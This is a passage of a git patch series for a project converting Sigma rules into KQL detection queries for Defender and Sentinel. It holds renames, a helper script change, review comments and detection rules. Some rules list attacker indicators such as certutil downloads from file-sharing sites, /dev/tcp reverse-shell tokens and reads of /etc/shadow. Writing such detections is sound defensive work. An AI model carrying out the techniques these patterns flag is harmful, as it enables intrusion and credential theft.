KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql rename to KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql rename to KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_service_installed.kql rename to KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql rename to KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql similarity index 100% rename from KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql rename to KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql similarity index 100% rename from KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql rename to KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql rename to KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql 
diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql similarity index 100% rename from KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql rename to KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql similarity index 100% rename from KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql rename to KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql 
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql rename to KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_disabled.kql diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_notification_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql rename to KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql 
diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql similarity index 100% rename from KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql rename to KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql similarity index 100% rename from KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql rename to KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql similarity index 100% rename from KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql rename to KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql rename to KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql similarity index 100% rename from KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql rename to KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql 
diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql rename to KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql similarity index 100% rename from KQL/rules/Collection/windows_recall_feature_enabled_registry.kql rename to KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql 
diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql similarity index 100% rename from KQL/rules/Defense Evasion/winget_admin_settings_modification.kql rename to KQL/rules/windows/registry/registry_set/winget_admin_settings_modification.kql diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql similarity index 100% rename from KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql rename to KQL/rules/windows/registry/registry_set/winlogon_allowmultipletssessions_enable.kql diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql rename to KQL/rules/windows/registry/registry_set/winlogon_notify_key_logon_persistence.kql diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/winsock2_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_classes_autorun_keys_modification.kql 
diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_currentversion_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql diff --git a/helper.py b/helper.py index f5b00022..0c7d3fe1 100644 --- a/helper.py +++ b/helper.py @@ -154,9 +154,15 @@ def extract_mitre_tactic(tags): tags = yaml_contents.get("tags", []) TACTIC_FOLDER = extract_mitre_tactic(tags) - # Write the KQL query to a .kql file organized by tactic - BASE_OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) - OUTPUT_DIR = os.path.join(BASE_OUTPUT_DIR, TACTIC_FOLDER) + # Preserve original sigma repository folder structure for outputs + # Compute the path of the YAML file relative to the sigma base + rel_path = os.path.relpath(yml, SIGMA_BASE) + rel_dir = os.path.dirname(rel_path) + # If the file was at the top-level of SIGMA_BASE, fall back to rule_folder + if rel_dir: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rel_dir) + else: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) os.makedirs(OUTPUT_DIR, exist_ok=True) # Sanitize filename and convert to snake_case diff --git a/sigma b/sigma index c2f1eb41..0a6d9299 160000 --- a/sigma +++ b/sigma 
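Review bot: In the helper.py hunk, `rel_path = os.path.relpath(yml, SIGMA_BASE)` yields a path with leading `..` segments whenever `yml` is not located under SIGMA_BASE, and the new `OUTPUT_DIR = os.path.join(OUTPUT_BASE, rel_dir)` then creates directories and writes .kql files outside OUTPUT_BASE; a guard before the join such as `if rel_path.startswith(os.pardir): raise ValueError(f"{yml} is outside {SIGMA_BASE}")` keeps all output inside the tree. The context line `TACTIC_FOLDER = extract_mitre_tactic(tags)` appears to be no longer read once the tactic-based layout is dropped, so it is likely dead code unless the value is used further down the function. The `rel_dir` fallback comment could also state that the top-level case only happens for YAML files placed directly in SIGMA_BASE, which the sigma submodule layout does not normally produce. The enclosing function starts and ends outside the hunk.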
@@ -1 +1 @@ -Subproject commit c2f1eb41bc5c9f246339545e8fd5ee14ed7f8332 +Subproject commit 0a6d9299743af4efec4268899b02d3d5c9335a1d From b50c2c466a0a50ad3ff5323bb0707b7a2c973bbd Mon Sep 17 00:00:00 2001 From: kaiberxc <89855993+Khadinxc@users.noreply.github.com> Date: Fri, 28 Nov 2025 22:54:38 +1100 Subject: [PATCH 12/17] update readme --- README.md | 26 ++++++-------------------- 1 file changed, 6 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index 28f49e3a..17de79dc 100644 --- a/README.md +++ b/README.md @@ -6,26 +6,12 @@ Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ ``` -├───rules -│ └───KQL -│ ├───Collection -│ ├───Command and Control -│ ├───Credential Access -│ ├───Defense Evasion -│ ├───Discovery -│ ├───Execution -│ ├───Exfiltration -│ ├───Impact -│ ├───Initial Access -│ ├───Lateral Movement -│ ├───Persistence -│ ├───Privilege Escalation -│ ├───Reconnaissance -│ └───Resource Development -├───rules-emerging-threats -│ └───KQL -└───rules-threat-hunting - └───KQL +├───KQL +│ ├───rules +│ ├───rules-compliance +│ ├───rules-emerging-threats +│ ├───rules-placeholder +│ └───rules-threat-hunting ``` ## How do I use the helper to do this locally or in a Detection as Code pipeline? From 85e802cc31412cc58cbb0557fa19595731356f9d Mon Sep 17 00:00:00 2001 
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 7 Dec 2025 02:39:14 +0000 Subject: [PATCH 13/17] chore: update KQL rules from latest Sigma rules --- .../html_file_opened_from_download_folder.kql | 15 +++++++++++++++ .../github_self_hosted_runner_execution.kql | 18 ++++++++++++++++++ .../suspicious_download_via_certutil_exe.kql | 4 ++-- ...nloaded_from_direct_ip_via_certutil_exe.kql | 4 ++-- ...m_file_sharing_website_via_certutil_exe.kql | 4 ++-- sigma | 2 +- 6 files changed, 40 insertions(+), 7 deletions(-) create mode 100644 KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql create mode 100644 KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql diff --git a/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql new file mode 100644 index 00000000..ab8db468 --- /dev/null +++ b/KQL/rules-threat-hunting/windows/process_creation/html_file_opened_from_download_folder.kql 
@@ -0,0 +1,15 @@
+// Title: HTML File Opened From Download Folder
+// Author: Joseph Kamau
+// Date: 2025-12-05
+// Level: low
+// Description: Detects web browser process opening an HTML file from a user's Downloads folder.
+// This behavior is could be associated with phishing attacks where threat actors send HTML attachments to users.
+// When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware.
+// During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1598.002, attack.t1566.001, attack.initial-access, attack.reconnaissance, detection.threat-hunting
+// False Positives:
+// - Opening any HTML file located in users directories via a browser process will trigger this.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\users\\" and ProcessCommandLine contains "\\Downloads\\" and ProcessCommandLine contains ".htm") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql
new file mode 100644
index 00000000..b43de036
--- /dev/null
+++ b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql
@@ -0,0 +1,18 @@
+// Title: Github Self-Hosted Runner Execution
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-11-29
+// Level: medium
+// Description: Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.
+// Shai-Hulud is an npm supply chain worm targeting CI/CD environments.
+// It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1071
+// False Positives:
+// - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure
+// - Authorized runner deployments by DevOps/Platform teams following change management
+// - Scheduled runner updates or reconfigurations on existing build agents
+// - Self-hosted runners that follow expected/known naming patterns
+// - Installation via expected/known configuration management tools (reflected mostly as parent process name)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "spawnclient" and (FolderPath endswith "\\Runner.Worker.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Worker.dll")) or ((ProcessCommandLine contains "run" or ProcessCommandLine contains "configure") and (FolderPath endswith "\\Runner.Listener.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Listener.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
index e7361697..3b0f2192 100644
--- a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
+++ b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
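Review bot: `ProcessCommandLine contains "run"` in the final `| where` of github_self_hosted_runner_execution.kql is close to vacuous for the Listener branch: KQL `contains` is a case-insensitive substring match, and a command line that launches Runner.Listener.exe normally carries that image name, so "run" is satisfied by "Runner" regardless of which verb follows. The branch therefore appears to fire on essentially every Runner.Listener execution rather than only on `run`/`configure`, which widens the already long false-positive list in the header. A term match, `ProcessCommandLine has "run"`, or the space-anchored literal `" run"` would restrict it to the verb; if the predicate is carried over verbatim from the upstream Sigma rule, the correction belongs there as well so the next regeneration does not undo it.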
@@ -4,7 +4,7 @@
 // Level: medium
 // Description: Detects the execution of certutil with certain flags that allow the utility to download files.
 // MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
 
 DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
index 9a163806..b4f0f0ac 100644
--- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
@@ -4,7 +4,7 @@ // Level: high // Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 +// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file +| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql index 40db540a..efe3691e 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql 
+++ b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql 
@@ -4,7 +4,7 @@ // Level: high // Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 +// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105 DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file +| where 
(ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/sigma b/sigma index 0a6d9299..0490e31e 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 0a6d9299743af4efec4268899b02d3d5c9335a1d +Subproject commit 0490e31eb5b4bfc5e98ef66bbc4870176e4bed9e From c7a903d5febb518b70acd451f1e8273f95b76e23 Mon Sep 17 00:00:00 2001 
From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 14 Dec 2025 02:40:21 +0000 Subject: [PATCH 14/17] chore: update KQL rules from latest Sigma rules --- ...cious_child_process_from_node_js_react2shell.kql | 13 +++++++++++++ ...cious_child_process_from_node_js_react2shell.kql | 13 +++++++++++++ .../process_creation/gui_input_capture_macos.kql | 2 +- ...on_of_werfault_exe_wer_dll_in_unusual_folder.kql | 2 +- .../desktop_ini_created_by_uncommon_process.kql | 13 +++++++++++++ ...system_process_name_in_unsuspected_locations.kql | 2 +- .../malicious_powershell_scripts_filecreation.kql | 2 +- ...ntially_suspicious_wdac_policy_file_creation.kql | 2 +- .../file/file_event/startup_folder_file_write.kql | 2 +- .../credui_dll_loaded_by_uncommon_process.kql | 2 +- .../load_of_rstrtmgr_dll_by_an_uncommon_process.kql | 2 +- ...em_dll_sideloading_from_non_system_locations.kql | 2 +- ...picious_volume_shadow_copy_vsstrace_dll_load.kql | 2 +- ..._dbgcore_dbghelp_dlls_from_uncommon_location.kql | 13 +++++++++++++ ...secure_loading_dbgcore_or_dbghelp_edr_freeze.kql | 13 +++++++++++++ .../image_load/wmic_loading_scripting_libraries.kql | 3 ++- ...ns_from_process_located_in_suspicious_folder.kql | 2 +- ..._potentially_suspicious_or_uncommon_location.kql | 2 +- ...cious_powershell_commandlets_processcreation.kql | 2 +- ...log_recon_activity_using_log_query_utilities.kql | 4 ++-- .../renamed_office_binary_execution.kql | 4 ++-- ...wnload_from_file_sharing_domain_via_curl_exe.kql | 2 +- ...wnload_from_file_sharing_domain_via_wget_exe.kql | 2 +- ...d_from_file_sharing_website_via_certutil_exe.kql | 2 +- ...ode_currentversion_autorun_keys_modification.kql | 2 +- sigma | 2 +- 26 files changed, 89 insertions(+), 23 deletions(-) create mode 100644 KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql create mode 100644 
KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql create mode 100644 KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql create mode 100644 KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql create mode 100644 KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..2dfa149d --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql 
@@ -0,0 +1,13 @@ +// Title: Linux Suspicious Child Process from Node.js - React2Shell +// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali +// Date: 2025-12-05 +// Level: high +// Description: Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell). +// This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands. +// When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c ). +// For other methods, the Image field will show the spawned process directly. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "/node_modules/next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "node_modules/.bin" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "/node") and (((ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" 